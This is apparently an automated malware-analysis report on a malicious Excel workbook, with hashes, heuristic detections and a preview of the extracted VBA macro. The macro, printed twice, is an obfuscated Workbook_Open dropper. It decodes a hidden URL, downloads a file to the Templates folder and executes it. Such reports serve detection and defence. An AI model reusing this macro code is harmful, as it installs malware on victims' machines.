Office (OLE) / .XLS malware analysis — malicious · 86557197fa540b84

MALICIOUS

Office (OLE) / .XLS

226.0 KB Created: 2020-05-16 13:49:11 Authoring application: Microsoft Excel First seen: 2026-06-19

MD5: 626646556de5e5bb6de0cb8d1bd766ad SHA-1: 8b88ab40f4e4d53566db47eea016b0b0ed4fc4c5 SHA-256: 86557197fa540b84962ed6befd9688d57112e91672fad311ce88193ed76675d4

388 Risk Score

Heuristics 10

Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    Set WshShell = CreateObject("WScript.Shell")
```

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.

Matched line in script

¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ = ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸.responseBody

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set WshShell = CreateObject("WScript.Shell")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Reference to ShellExecute API high SC_STR_SHELLEXEC

Reference to ShellExecute API
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12419 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12419 bytes
SHA-256: `9a12f67800aa4a2de1d94d511ee4958b94515c28c7410aff01088156078bea2d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub Cil() End Sub Attribute VB_Name = "Hjfmkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public Function ®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤(¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·) °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³ = " ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥" ³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾ = " ¿¡@#$%^&()_+\|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY" For i = 1 To Len(¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·) £µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥¸²· = InStr(°¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³, Mid(¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·, i, 1)) If £µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥¸²· > 0 Then ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ = Mid(³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾, £µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥¸²·, 1) ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª = ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª + ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ Else ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª = ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª + Mid(¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·, i, 1) End If Next ®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤ = ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª End Function Private Sub Workbook_Open() Dim WshShell As Object Dim ASpecialPathA As String Dim ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½ As Integer ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½ = Chr(50) + Chr(48) + Chr(48) Set WshShell = CreateObject("WScript.Shell") ASpecialPathA = WshShell.SpecialFolders("Templates") Dim °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ Dim ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ Dim ¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥ Dim ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯ Dim »¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡ Dim ¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ As Integer Dim ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸ Dim ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½² ¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ = 1 Set ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸ = CreateObject("microsoft.xmlhttp") Set »¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡ = CreateObject("Shell.Application") ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯ = ASpecialPathA + ®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤("\Mà¶ØGZ.ÂÛÂ") ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸.Open "get", ®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤("hÖÖÓÕ://ÅlÒÀÖvÒÀÖÄÅ.ÜdÅÕ.ÂÙ/ÁÂÙkÂÅÔgÖÒÃÃÄÁÂÀÃÅmÒÃÃÄkÂÅÔgÖÂÔ/ÂÖwÂÖjkdÅgjÂdÃlkkÖgÂÔkÖgÅÂÔÖhÂÔgÔgÂÔgÂ/ÕÂÔÛÁvÂÔ1.ÂÛÂ"), False ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸.send ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ = ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸.responseBody If ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸.Status = 200 Then Set °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ = CreateObject("adodb.stream") °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ.Open °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ.Type = ¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ.Write ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹ °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ.SaveToFile ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯, ¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ + ¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ.Close End If »¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡.Open (¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯) End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 9a12f67800aa4a2de1d94d511ee4958b94515c28c7410aff01088156078bea2d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub Cil()

End Sub

Attribute VB_Name = "Hjfmkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
   Public Function ®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤(¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·)
        °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥"
        ³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾ = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For i = 1 To Len(¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·)
            £µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥¸²· = InStr(°¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³, Mid(¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·, i, 1))
            If £µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥¸²· > 0 Then
                ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢ = Mid(³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾, £µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥¸²·, 1)
                ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª = ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª + ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢
            Else
                ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª = ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª + Mid(¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·, i, 1)
            End If
        Next
        ®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤ = ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª
    End Function

Private Sub Workbook_Open()
Dim WshShell As Object
Dim ASpecialPathA As String
Dim ½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½ As Integer
½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½ = Chr(50) + Chr(48) + Chr(48)
  

    Set WshShell = CreateObject("WScript.Shell")
    ASpecialPathA = WshShell.SpecialFolders("Templates")
Dim °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³³²µ
Dim ¡¤¾¿´·¬§®µ³³²µ¤¡´¾¡¢¸²´¢½°¬¯¶¡»¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹
Dim ¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥
Dim ¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯
Dim »¶°¹¾µµ££½¬¥»¨»¦µ¼µ´¡»¹¨¼¬¨ª¤··«ª¥¹¢¿¦½®£³¤¿¼¼»¾¶²¶§¹°º¼½¹¨º£¬¯¹©¿º¬¦¾¾·¢¾£µ½²¼´·©¾½¹ª¬²¾¢²¡
